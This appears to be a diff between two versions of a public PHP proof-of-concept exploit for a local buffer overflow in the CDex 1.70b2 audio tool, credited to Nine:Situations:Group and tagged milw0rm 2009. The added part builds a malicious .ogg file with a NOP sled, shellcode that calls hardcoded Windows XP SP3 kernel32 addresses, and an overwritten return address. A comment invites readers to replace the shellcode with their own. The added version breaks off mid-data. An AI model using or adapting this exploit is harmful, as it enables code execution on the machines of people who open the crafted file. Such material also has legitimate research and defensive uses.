-"\x00\x00\x00\x00\x00\x00\x00\x66\x07\x00\x00\x02\x00\x00\x00\x6a".
-"\xa0\x3f\xb6\x01\x91\xcc\x10\x89\x88\xc5\x20\x31\xa1\x1a\x28\x2a".
-"\xa6\x03\x80\xc5\x05\x86\x7c\x00\xc8\xd0\xd8\x48\xbb\xb8\x80\x2e".
-"\x03\x5c\xd0\xc5\x5d\x07\x42\x08\x42\x10\x82\x58\x1c\x40\x01\x09".
-"\x38\x38\xe1\x86\x27\xde\xf0\x84\x1b\x9c\xa0\x53\x54\xea\x40\x00".
-"\x00\x00\x00\x00\x1e\x00\xe0\x01\x00\x20\xd9\x00\x22\x22\xa2\x99".
-"\xe3\xe8\xf0\xf8\x00\x09\x11\x19\x21\x29\x31\x39\x41\x11\x00\x00".
-"\x00\x00\x00\x3b\x00\xf8\x00\x00\x48\x52\x80\x88\x88\x68\xe6\x38".
-"\x3a\x3c\x3e\x40\x42\x44\x46\x48\x4a\x4c\x4e\x50\x02\x00\x00\x01".
-"\x04\x00\x00\x00\x00\x40\x00\x01\x08\x08\x08\x00\x00\x00\x00\x00".
-"\x04\x00\x00\x00\x08\x08\x4f\x67\x67\x53\x00\x04\x61\x18\x00\x00".
-"\x00\x00\x00\x00\x66\x07\x00\x00\x03\x00\x00\x00\xa5\xbe\xcf\x36".
-"\x09\x2c\x86\x63\x01\x01\x01\xfc\xff\x17\xd4\x1c\xf7\xd1\x45\xd0".
-"\xfb\xcf\xce\x6b\x8e\xfb\xe8\x22\xe8\xfd\x67\xe7\x64\x90\x02\x19".
-"\xc6\x08\x00\xe2\x46\x62\x05\x6b\x7f\xef\xb3\xd8\xfd\xfb\xef\xac".
-"\xb4\x92\xc0\xef\x5f\x05\xda\x65\xfc\xf7\x48\x5f\xa4\x80\x51\x33".
-"\x45\x8b\xa2\xa2\xcb\xf8\xef\x91\xbe\x48\x01\xa3\x66\x8a\x16\x45".
-"\x05\x88\x64\x66\xa7\x33\x49\x34\x00\x00\x24\x90\x02\x10\x38\x15".
-"\x20\x4c\x00\x24\x00\x00\x00\xd0\x0a\xaa\xd1\x50\x55\x4c\xd4\xd2".
-"\x26\xab\x6a\x9a\x98\x34\xfe\x34\xba\xbd\x52\x1d\xc0\x80\x78\xc6".
-"\xa2\x0c\x9d\xe4\x10\x40\x11\x35\xac\x61\xa3\x29\x50\xa4\x90\x08".
-"\xd2\x8a\x76\x50\x7f\x1a\x5d\x2b\x55\x48\x00\x94\x52\x4a\x59\x0a".
-"\x30\x62\x84\xd2\x96\x07\xc0\x18\xb0\x80\x62\x8d\xb7\xa0\x01\xc1".
-"\x5a\x23\x80\x01\x00\x00\x9d\x00\x00\x00\x80\x00\xde\x65\xfc\xef".
-"\x28\x5f\x4a\x81\xb1\xc9\x84\xe8\x32\xfe\x77\x94\x2f\xa5\xc0\xd8".
-"\x64\x42\x80\x80\x24\x60\x31\x66\x22\x9d\x0a\x00\x20\x20\x01\x06".
-"\x00\x00\x00\x80\x2f\x36\xb7\x2a\x7c\x65\xb2\xde\xba\x95\xb7\x4b".
-"\x06\x72\xfe\xee\x5c\x00\xbe\x3e\xb3\xb9\x75\xab\x02\xf0\x06\x38".
-"\x51\x51\x40\x2c\xad\xd9\x68\x05\xab\x36\x58\xd7\xa8\x02\x62\xb1".
-"\x18\x80\xfb\x9c\xf9\x79\x73\xab\x02\x5b\xb7\x7e\xf8\xfc\x19\x0e".
-"\x0e\x0e\xbe\x65\xfc\xf7\x48\x6f\x8c\x01\x0e\x90\x35\xdc\x7c\x8f".
-"\x77\xdc\xc0\x34\xcc\x1c\x45\x29\x6a\x3e\xe8\x99\x51\xe2\xa8\x20".
-"\x54\x90\x10\xe1\x24\x00\x00\x00\x00\x80\xfa\x30\x0c\x45\x44\x44".
-"\xa4\x33\xcb\xb2\x52\xa9\x68\xb5\xda\xd5\x4a\x55\x55\x55\x5d\x96".
-"\x65\xb1\xfd\xef\xbf\xff\x02\x5c\xc6\x86\x61\xb8\x7b\x79\x09\xac".
-"\xa2\xaa\xaa\xaa\x4f\x18\x99\x29\x49\x52\xb4\x2c\xcb\xb2\x2c\xcb".
-"\xb2\x2c\xcb\xb2\x2c\xdd\x4d\xd9\xa1\xaa\xae\x56\xab\xb5\x6b\xd7".
-"\x6a\x57\xab\xd5\x6a\xb5\x5a\xd6\x75\xb5\x67\x06\x80\xcc\x0c\x0c".
-"\xc3\x30\x0c\xc3\x70\xa5\x95\x56\x5a\xa9\x01\xa0\xaa\xec\x38\x8e".
-"\xe3\x52\xad\x54\x2a\x95\x4a\xa5\x52\xa9\xa8\xaa\xaa\x2e\x8b\x67".
-"\x88\x90\xa2\x28\x14\xbd\x5e\xaf\xd7\xeb\xf5\x8a\xa2\x14\x85\x88".
-"\x88\x00\xac\xad\xad\xaa\xaa\xaa\x7f\xff\xfd\xf7\xdf\xaa\xaa\xaa".
-"\x4f\x46\x78\xde\xdc\xdc\xdc\xdc\xa4\x14\x3a\x00\x00\x78\xc5\x55".
-"\x55\x55\x55\x55\x55\x95\x87\xfa\xc0\x30\x0c\xeb\x00\x46\x7d\x18".
-"\x86\x61\x18\x86\x97\xbc\xcf\xcf\xcf\xcf\xcf\x4f\x4f\x7d\x7d\x7d".
-"\x7d\x7d\x3d\x80\x5d\x55\xf7\x7d\xdf\xb7\x6d\xff\xab\x00\xbe\x65".
-"\xfc\xf7\x90\x6f\xac\x81\x35\x24\xeb\xa5\x6f\xcb\xf8\xdf\x2e\xdf".
-"\x60\xe0\x40\x46\xc2\xb8\x34\xbd\x5e\xaf\xd7\xeb\xad\x61\xb3\x3a".
-"\x83\xd8\xa5\x03\xe6\x18\x98\x04\x00\x00\x00\x60\xb1\xb5\xb1\xb7".
-"\x77\xb4\x1a\x55\x3a\x1e\x4d\x4e\x35\xcc\x00\x80\x58\x2c\x56\x54".
-"\x45\xbb\x6f\x54\xf6\x48\xb6\x99\x0f\xf9\x90\x0f\xb9\xca\x20\x6b".
-"\x0d\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x8c".
-"\xe2\x28\x8e\x2c\x6f\x6e\x6e\x6e\x1a\xd6\xe6\xe6\xe6\xe6\x66\x59".
-"\x96\xa5\xd6\xc5\xb2\x2c\xcb\xb2\x2c\x16\x8b\xaa\xa8\x8a\xaa\xa8".
-"\x7a\x6d\x55\xad\xaa\x8a\x5a\x2f\xe2\x1e\x80\x0c\xcb\xb2\xbc\x84".
-"\x41\x18\x84\x41\x18\x84\x41\x18\x84\x41\x18\xac\xb2\x2c\x0b\x58".
-"\x65\x59\x96\x65\x59\x96\x37\x0e\x32\x52\x5c\x94\x45\xa9\x54\xf4".
-"\x15\x8d\x6e\x5d\xba\x75\xe9\xd4\xa1\x53\x87\xce\x35\x6b\x35\x5a".
-"\xcd\x4a\x51\x95\x55\x96\x1b\x00\x00\x58\x9b\x00\xc0\x7a\x6b\xce".
-"\xf9\xf6\xf6\xf6\xf6\x36\x0c\x2c\x0b\x80\x92\xe5\xcf\x9f\x3f\x7f".
-"\xfe\xfc\xf9\xb3\x0b\x00\x23\xcb\x8a\x83\x30\x08\x83\x30\x08\x17".
-"\xcb\xb2\x2c\x2b\xba\xf2\x00\x00\xd4\xca\xb2\x94\x65\x59\xd6\xba".
-"\xac\xcb\xba\xac\x8b\x65\x59\xd3\x03\x00\xbc\x3f\x7f\xfe\xfc\xf9".
-"\xf3\xe7\xcf\x00\x00";
-$fp=fopen("evil.ogg","w+");
-if (!$fp) {die("cannot create evil.ogg...");}
-@fputs($fp,$_frgmnt1.$_frgmnt2.$_frgmnt3);
-@fclose($fp);
-?>
-
-# milw0rm.com [2009-03-18]
+<?PHP
+/*
+CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3)
+by Nine:Situations:Group::Pyrokinesis
+
+software site: http://cdexos.sourceforge.net/
+our site: http://retrogod.altervista.org/
+
+A very reliable buffer overflow exists in the way cdex process Ogg Vorbis Info
+headers.
+usage:
+c:\php\php 9sg_cdex_local.php
+evil.ogg is created, now navigate:
+Main Menu-> Tools -> Media file Player -> Select files -> Browse to a folder ->
+-> Open -> Play evil.ogg
+*/
+
+$_frgmnt1 =
+"OggS".                             //for what I understood ... beginning
+"\x00".                             //stream_structure_version
+"\x02".                             //header_type_flag
+"\x00\x00\x00\x00\x00\x00\x00\x00". //granular_position
+"\x66\x07\x00\x00".                 //bitstream_serial_number
+"\x00\x00\x00\x00".                 //page_sequence_number
+"\x92\xa8\x3b\xd9".                 //CRC_checksum
+"\x01".                             //number_page_segments
+"\x1e".                             //segments_table
+"\x01".
+"vorbis".
+"\x00\x00\x00\x00\x02\x44\xac\x00\x00\x00\x00\x00\x00".
+"\x00\x71\x02\x00\x00\x00\x00\x00\xb8\x01";
+
+$_frgmnt2 =
+"OggS".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x07".
+"\x00\x00\x01\x00\x00\x00".
+"\x00\x00\x00\x00". //set crc to 0, after calculate the real crc
+"\x51\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\x93\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff".
+"\xff\xff\xff\xff\xff\xff\x03vorbis\x1d\x00\x00".
+"\x00Xiph.Org\x20libVor".
+"bis\x20I\x2020040629\x03\x00".
+"\x00\x00\x07\x20\x00\x00".
+"ARTIST=";
+
+$payload_len=8192;
+
+//msg box shellcode saying "hey" ...
+//replace with your own, the script recalculates the CRC checksum
+$scode =
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a".
+"\xbb\x7b\x1d\x80\x7c". //LoadLibraryA at 0x7c801d7b in kernel32.dll  xpsp3
+"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50".
+"\xbb\x30\xae\x80\x7c". //GetProcAddress at 0x7c80ae30 in kernel32.dll
+"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51".
+"\x51\x52\xff\xd0\x31\xd2\x50".
+"\xb8\xfa\xca\x81\x7c". //ExitProcess at 0x7c81cafa in kernel32.dll
+"\xff\xd0\xe8\xc4\xff".
+"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff".
+"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff".
+"\xff\x48\x65\x79\x4e";
+
+$_boom=str_repeat("\x90",2048 - strlen($scode)).$scode.
+"\x67\x86\x86\x7c".  //eip -> 0x7C868667      call esp kernel32.dll
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
+"\x83\xec\x7f". // sub esp,07f
+"\x83\xec\x7f". //..
+"\x83\xec\x7f". //..
+"\x83\xec\x7f". //..
+"\x83\xec\x7f". //..
+"\xff\xd4". //call esp
+"\x90\x90\x90".
+"\x00\x00\x00\x00";//if replaced with non-zero chars, overwrites seh ... do not touch
+
+$_frgmnt2.=$_boom."\x90\x90\x90\x90\x90\x90\x90\x90".str_repeat("\x90",$payload_len - strlen($_boom) - 8);
+$_frgmnt2.="\x0a\x20\x00\x00".
+"PERFORMER=";
+$_frgmnt2.=str_repeat("\x90",$payload_len);
+$_frgmnt2.="\x09\x00\x00\x00".
+"DATE=2009".
+"\x01\x05".
+"vorbis".
+"\x29\x42\x43\x56\x01\x00\x08\x00\x00\x00\x31\x4c\x20\xc5\x80\xd0".
+"\x90\x55\x00\x00\x10\x00\x00".
+"\x60\x24\x29\x0e\x93\x66\x49\x29\xa5".
+"\x94\xa1\x28\x79\x98\x94\x48\x49\x29\xa5\x94\xc5\x30\x89\x98\x94".
+"\x89\xc5\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x20".
+"\x34\x64\x15\x00\x00\x04\x00\x80\x28\x09\x8e\xa3\xe6\x49\x6a\xce".
+"\x39\x67\x18\x27\x8e\x72\xa0\x39\x69\x4e\x38\xa7\x20\x07\x8a\x51".
+"\xe0\x39\x09\xc2\xf5\x26\x63\x6e\xa6\xb4\xa6\x6b\x6e\xce\x29\x25".
+"\x08\x0d\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21".
+"\x85\x14\x62\x88\x21\x86\x18\x62\x88\x21\x87\x1c\x72\xc8\x21\xa7".
+"\x9c\x72\x0a\x2a\xa8\xa0\x82\x0a\x32\xc8\x20\x83\x4c\x32\xe9\xa4".
+"\x93\x4e\x3a\xe9\xa8\xa3\x8e\x3a\xea\x28\xb4\xd0\x42\x0b\x2d\xb4".
+"\xd2\x4a\x4c\x31\xd5\x56\x63\xae\xbd\x06\x5d\x7c\x73\xce\x39\xe7".
+"\x9c\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x20\x00".
+"\x00\x04\x42\x06\x19\x64\x10\x42\x08\x21\x85\x14\x52\x88\x29\xa6".
+"\x98\x72\x0a\x32\xc8\x80\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00".
+"\x00\x00\x47\x91\x14\x49\xb1\x14\xcb\xb1\x1c\xcd\xd1\x24\x4f\xf2".
+"\x2c\x51\x13\x35\xd1\x33\x45\x53\x54\x4d\x55\x55\x55\x55\x75\x5d".
+"\x57\x76\x65\xd7\x76\x75\xd7\x76\x7d\x59\x98\x85\x5b\xb8\x7d\x59".
+"\xb8\x85\x5b\xd8\x85\x5d\xf7\x85\x61\x18\x86\x61\x18\x86\x61\x18".
+"\x86\x61\xf8\x7d\xdf\xf7\x7d\xdf\xf7\x7d\x20\x34\x64\x15\x00\x20".
+"\x01\x00\xa0\x23\x39\x96\xe3\x29\xa2\x22\x1a\xa2\xe2\x39\xa2\x03".
+"\x84\x86\xac\x02\x00\x64\x00\x00\x04\x00\x20\x09\x92\x22\x29\x92".
+"\xa3\x49\xa6\x66\x6a\xae\x69\x9b\xb6\x68\xab\xb6\x6d\xcb\xb2\x2c".
+"\xcb\xb2\x0c\x84\x86\xac\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00".
+"\x00\xa0\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a".
+"\xa6\x69\x9a\xa6\x69\x9a\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65".
+"\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59".
+"\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xc8\x2a".
+"\x00\x40\x02\x00\x40\xc7\x71\x1c\xc7\x71\x24\x45\x52\x24\xc7\x72".
+"\x2c\x07\x08\x0d\x59\x05\x00\xc8\x00\x00\x08\x00\x40\x52\x2c\xc5".
+"\x72\x34\x47\x73\x34\xc7\x73\x3c\xc7\x73\x3c\x47\x74\x44\xc9\x94".
+"\x4c\xcd\xf4\x4c\x0f\x08\x0d\x59\x05\x00\x00\x02\x00\x08\x00\x00".
+"\x00\x00\x00\x40\x31\x1c\xc5\x71\x1c\xc9\xd1\x24\x4f\x52\x2d\xd3".
+"\x72\x35\x57\x73\x3d\xd7\x73\x4d\xd7\x75\x5d\x57\x55\x55\x55\x55".
+"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55".
+"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x81\xd0".
+"\x90\x55\x00\x00\x04\x00\x00\x21\x9d\x66\x96\x6a\x80\x08\x33\x90".
+"\x61\x20\x34\x64\x15\x00\x80\x00\x00\x00\x18\xa1\x08\x43\x0c\x08".
+"\x0d\x59\x05\x00\x00\x04\x00\x00\x88\xa1\xe4\x20\x9a\xd0\x9a\xf3".
+"\xcd\x39\x0e\x9a\xe5\xa0\xa9\x14\x9b\xd3\xc1\x89\x54\x9b\x27\xb9".
+"\xa9\x98\x9b\x73\xce\x39\xe7\x9c\x6c\xce\x19\xe3\x9c\x73\xce\x29".
+"\xca\x99\xc5\xa0\x99\xd0\x9a\x73\xce\x49\x0c\x9a\xa5\xa0\x99\xd0".
+"\x9a\x73\xce\x79\x12\x9b\x07\xad\xa9\xd2\x9a\x73\xce\x19\xe7\x9c".
+"\x0e\xc6\x19\x61\x9c\x73\xce\x69\xd2\x9a\x07\xa9\xd9\x58\x9b\x73".
+"\xce\x59\xd0\x9a\xe6\xa8\xb9\x14\x9b\x73\xce\x89\x94\x9b\x27\xb5".
+"\xb9\x54\x9b\x73\xce\x39\xe7\x9c\x73\xce\x39\xe7\x9c\x73\xce\xa9".
+"\x5e\x9c\xce\xc1\x39\xe1\x9c\x73\xce\x89\xda\x9b\x6b\xb9\x09\x5d".
+"\x9c\x73\xce\xf9\x64\x9c\xee\xcd\x09\xe1\x9c\x73\xce\x39\xe7\x9c".
+"\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x40\x00\x00".
+"\x04\x61\xd8\x18\xc6\x9d\x82\x20\x7d\x8e\x06\x62\x14\x21\xa6\x21".
+"\x93\x1e\x74\x8f\x0e\x93\xa0\x31\xc8\x29\xa4\x1e\x8d\x8e\x46\x4a".
+"\xa9\x83\x50\x52\x19\x27\xa5\x74\x82\xd0\x90\x55\x00\x00\x20\x00".
+"\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21".
+"\x86\x18\x62\x88\x21\xa7\x9c\x72\x0a\x2a\xa8\xa4\x92\x8a\x2a\xca".
+"\x28\xb3\xcc\x32\xcb\x2c\xb3\xcc\x32\xcb\xac\xc3\xce\x3a\xeb\xb0".
+"\xc3\x10\x43\x0c\x31\xb4\xd2\x4a\x2c\x35\xd5\x56\x63\x8d\xb5\xe6".
+"\x9e\x73\xae\x39\x48\x6b\xa5\xb5\xd6\x5a\x2b\xa5\x94\x52\x4a\x29".
+"\xa5\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19".
+"\x85\x14\x52\x48\x21\x86\x98\x72\xca\x29\xa7\xa0\x82\x0a\x08\x0d".
+"\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\xf0\x24\xcf\x11\x1d\xd1".
+"\x11\x1d\xd1\x11\x1d\xd1\x11\x1d\xd1\x11\x1d\xcf\xf1\x1c\x51\x12".
+"\x25\x51\x12\x25\xd1\x32\x2d\x53\x33\x3d\x55\x54\x55\x57\x76\x6d".
+"\x59\x97\x75\xdb\xb7\x85\x5d\xd8\x75\xdf\xd7\x7d\xdf\xd7\x8d\x5f".
+"\x17\x86\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59".
+"\x96\x65\x09\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84".
+"\x14\x52\x48\x21\x85\x94\x62\x8c\x31\xc7\x9c\x83\x4e\x42\x09\x81".
+"\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x47\x71\x14\xc7".
+"\x91\x1c\xc9\x91\x24\x4b\xb2\x24\x4d\xd2\x2c\xcd\xf2\x34\x4f\xf3".
+"\x34\xd1\x13\x45\x51\x34\x4d\x53\x15\x5d\xd1\x15\x75\xd3\x16\x65".
+"\x53\x36\x5d\xd3\x35\x65\xd3\x55\x65\xd5\x76\x65\xd9\xb6\x65\x5b".
+"\xb7\x7d\x59\xb6\x7d\xdf\xf7\x7d\xdf\xf7\x7d\xdf\xf7\x7d\xdf\xf7".
+"\x7d\xdf\xd7\x75\x20\x34\x64\x15\x00\x20\x01\x00\xa0\x23\x39\x92".
+"\x22\x29\x92\x22\x39\x8e\xe3\x48\x92\x04\x84\x86\xac\x02\x00\x64".
+"\x00\x00\x04\x00\xa0\x28\x8e\xe2\x38\x8e\x23\x49\x92\x24\x59\x92".
+"\x26\x79\x96\x67\x89\x9a\xa9\x99\x9e\xe9\xa9\xa2\x0a\x84\x86\xac".
+"\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xa0\x68\x8a\xa7\x98".
+"\x8a\xa7\x88\x8a\xe7\x88\x8e\x28\x89\x96\x69\x89\x9a\xaa\xb9\xa2".
+"\x6c\xca\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb".
+"\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba\xae\xeb\xba".
+"\xae\xeb\xba\xae\xeb\xba\x40\x68\xc8\x2a\x00\x40\x02\x00\x40\x47".
+"\x72\x24\x47\x72\x24\x45\x52\x24\x45\x72\x24\x07\x08\x0d\x59\x05".
+"\x00\xc8\x00\x00\x08\x00\xc0\x31\x1c\x43\x52\x24\xc7\xb2\x2c\x4d".
+"\xf3\x34\x4f\xf3\x34\xd1\x13\x3d\xd1\x33\x3d\x55\x74\x45\x17\x08".
+"\x0d\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\xc0\x90\x0c".
+"\x4b\xb1\x1c\xcd\xd1\x24\x51\x52\x2d\xd5\x52\x35\xd5\x52\x2d\x55".
+"\x54\x3d\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55".
+"\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55".
+"\x55\x55\x55\xd5\x34\x4d\xd3\x34\x81\xd0\x90\x95\x00\x00\x19\x00".
+"\x00\xe4\xa4\xa6\xd4\x7a\x0e\x12\x62\x90\x39\x89\x41\x68\x08\x49".
+"\xc4\x1c\xc5\x5c\x3a\xe9\x9c\xa3\x5c\x8c\x87\x90\x23\x46\x49\xed".
+"\x21\x53\xcc\x10\x04\xb5\x98\xd0\x49\x85\x14\xd4\xe2\x5a\x6a\x1d".
+"\x73\x54\x8b\x8d\xad\x64\x48\x41\x2d\xb6\xc6\x52\x21\xe5\xa8\x07".
+"\x42\x43\x56\x08\x00\xa1\x19\x00\x0e\xc7\x01\x1c\x4d\x03\x1c\x4b".
+"\x03\x00\x00\x00\x00\x00\x00\x00\x49\xd3\x00\x4d\x14\x01\xcd\x13".
+"\x01\x00\x00\x00\x00\x00\x00\xc0\xd1\x34\x40\x13\x3d\x40\x13\x45".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x1c\x4d\x03\x34\x51\x04\x34\x51\x04\x00\x00\x00".
+"\x00\x00\x00\x00\x4d\x14\x01\xd1\x54\x01\xd1\x34\x01\x00\x00\x00".
+"\x00\x00\x00\x40\x13\x45\xc0\x33\x45\x40\x34\x55\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x1c\x4d\x03\x34\x51\x04\x34\x51\x04\x00\x00\x00\x00\x00\x00\x00".
+"\x4d\x14\x01\x51\x35\x01\x4f\x34\x01\x00\x00\x00\x00\x00\x00\x40".
+"\x13\x45\x40\x34\x4d\x40\x54\x4d\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".
+"\x00\x00\x01\x0e\x00\x00\x01\x16\x42\xa1\x21\x2b\x02\x80\x38\x01".
+"\x00\x87\xe3\x40\x92\x20\x49\xf0\x34\x80\x63\x59\xf0\x3c\x78\x1a".
+"\x4c\x13\xe0\x58\x16\x3c\x0f\x9a\x07\xd3\x04\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x40\xf2\x34\x78\x1e\x3c\x0f\xa6\x09\x90\x34\x0f".
+"\x9e\x07\xcf\x83\x69\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20".
+"\x79\x1e\x3c\x0f\x9e\x07\xd3\x04\x48\x9e\x07\xcf\x83\xe7\xc1\x34".
+"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x4c\x13\xa6\x09\xd1".
+"\x84\x6a\x02\x3c\xd3\x84\x69\xc2\x34\x61\xaa\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21\x2b".
+"\x02\x80\x38\x01\x00\x87\xa3\x48\x12\x00\x00\x38\x92\x64\x59\x00".
+"\x00\xa0\x48\x92\x65\x01\x00\x80\x65\x59\x9e\x07\x00\x00\x92\x65".
+"\x79\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
